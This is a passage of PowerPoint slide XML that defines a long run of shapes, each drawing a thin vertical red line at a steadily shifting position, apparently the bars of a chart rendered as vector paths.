          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="object 455"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550489" y="5816571"/>
            <a:ext cx="0" cy="173652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="87630">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="87475"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="object 456"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570717" y="5669611"/>
            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160135"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="object 457"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570717" y="5666636"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="163138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="object 458"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590552" y="5747359"/>
            <a:ext cx="0" cy="240345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="121285">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="120901"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="object 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590552" y="5744383"/>
            <a:ext cx="0" cy="246636"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="124460">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="123904"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="object 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610384" y="5569647"/>
            <a:ext cx="0" cy="417772"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="210819">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="210579"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="object 461"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610384" y="5566672"/>
            <a:ext cx="0" cy="424063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="213994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="213582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="object 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6630615" y="5780676"/>
            <a:ext cx="0" cy="206367"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="104139">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="104088"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="object 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6630615" y="5777701"/>
            <a:ext cx="0" cy="212659"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="107314">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="107090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="object 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6650449" y="5636291"/>
            <a:ext cx="0" cy="351079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="177164">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="176949"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="object 465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6650449" y="5633316"/>
            <a:ext cx="0" cy="357371"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="180339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="179951"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="object 466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670281" y="5736246"/>
            <a:ext cx="0" cy="251670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="127000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="126508"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="object 467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670281" y="5733273"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129511"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="object 468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6690116" y="5641844"/>
            <a:ext cx="0" cy="346046"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="174625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="174147"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="object 469"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6690116" y="5638869"/>
            <a:ext cx="0" cy="351079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="177164">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="177150"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="object 470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709948" y="5797340"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="object 471"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709948" y="5794363"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="object 472"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729783" y="5652946"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="object 473"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729783" y="5649973"/>
            <a:ext cx="0" cy="341012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="172085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171546"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="object 474"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6749615" y="5775125"/>
            <a:ext cx="0" cy="212659"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="107314">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="106889"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="object 475"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6749615" y="5772149"/>
            <a:ext cx="0" cy="218951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="110489">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109892"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="object 476"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769449" y="5564096"/>
            <a:ext cx="0" cy="424063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="213994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="213381"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="object 477"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769449" y="5561121"/>
            <a:ext cx="0" cy="429097"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="216535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="216384"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="object 478"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6789282" y="5730695"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="object 479"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6789282" y="5727720"/>
            <a:ext cx="0" cy="262995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="132714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="132312"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="object 480"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809116" y="5575207"/>
            <a:ext cx="0" cy="412736"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="208280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="207774"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="object 481"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809116" y="5572231"/>
            <a:ext cx="0" cy="417772"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="210819">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="210777"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="object 482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6828948" y="5686272"/>
            <a:ext cx="0" cy="300745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="151764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
